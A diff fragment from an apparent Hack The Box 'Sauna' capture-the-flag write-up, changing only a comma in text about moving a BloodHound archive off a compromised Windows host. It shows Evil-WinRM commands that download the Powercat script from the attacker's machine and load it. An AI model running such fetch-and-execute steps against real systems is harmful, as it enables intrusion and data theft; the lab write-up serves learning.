flast101/HTB-writeups/sauna/index.md

 ~~~

-Now we want to transfer the file “20200524170226_BloodHound.zip” back to our kali machine.
+Now, we want to transfer the file “20200524170226_BloodHound.zip” back to our kali machine.
 We download **`Powercat`** and load the script :
 ~~~
 *Evil-WinRM* PS C:\Users\All USers\temp> iwr http://10.10.14.23/powercat.ps1 -o pwr.ps1
 *Evil-WinRM* PS C:\Users\All USers\temp> . .\pwr.ps1